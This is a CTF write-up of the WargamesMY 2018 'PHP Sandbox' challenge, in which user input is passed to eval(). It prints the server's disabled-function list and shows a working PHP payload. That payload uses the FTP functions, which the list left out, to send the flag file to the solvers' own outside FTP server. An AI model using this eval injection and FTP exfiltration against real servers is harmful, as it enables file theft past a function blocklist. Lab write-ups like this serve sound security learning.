WargamesMY CTF 2018: PHP Sandbox.
P/S: We forgot to take screenshots for the writeup on this one, luckily there still Burp history available.
View page source we found <!– source code ./source.txt –> in html comment. View source.txt we got:
Basically it is a single web page & form that take user input in parameter code and pass into eval() function.
Great! never think WGMY web challenge will be this ez pz. Lets try to do RCE..
Snap! never under estimate the troll level of WGMY challenge author. All command execution function is disabled. var_dump(ini_get(‘disable_functions’)); reveal all the disabled function:
1 |
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,shell_exec,proc_open,popen,system,passthru,file_get_contents,readfile,fopen,ini_set,fgets,include,include_once,require,require_once,fgetcsv,parse_ini_file,rename,copy,symlink,fseek,file,file_exists,delete,chmod,fpassthru,freed,fscanf,stream_wrapper_register,stream_wrapper_restore,fsockopen,pfsockopen,curl_init,stream_context_create,show_source,highlight_file,sleep,token_get_all,yaml_parse_file |
So that explain why the name of the challenge is PHP Sandbox.
Later we found scandir() is usable and reveal the target flag file .supers3cr37file.php in the same www directory.
Most of the read/view file function is also disabled (maybe not all, we just cant think of any else at that time). Later we found FTP Function is usable. The idea is to transfer the flag back to us via FTP, so we run FTP server in our box.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
$remote_file = 'flagphpsandbox.txt'; /* FTP Account */ $ftp_host = '60.52.67.38'; /* host */ $ftp_user_name = 'ayamkambing'; /* username */ $ftp_user_pass = 'wgmy2018'; /* password */ /* New file name and path for this file */ $local_file = '/var/www/html/.supers3cr37file.php'; /* Connect using basic FTP */ $connect_it = ftp_connect( $ftp_host ); /* Login to FTP */ $login_result = ftp_login( $connect_it, $ftp_user_name, $ftp_user_pass ); /* Download $remote_file and save to $local_file */ if ( ftp_put( $connect_it, $remote_file, $local_file, FTP_BINARY ) ) { echo "WOOT! Successfully written to $local_file\n"; } else { echo "Doh! There was a problem\n"; } /* Close the connection */ ftp_close( $connect_it ); |
Submit above code.
Target flag file were successfully transfer to our box and finally,
$ cat flagphpsandbox.txt
<?php /*$flag = ‘wgmy{func_bl4ck1ist_1z_s0_b4d}’;*/ ?>
Flag : wgmy{func_bl4ck1ist_1z_s0_b4d}
References: PHP Scandir Function
Read All Writeup : WargamesMY CTF 2018 Writeup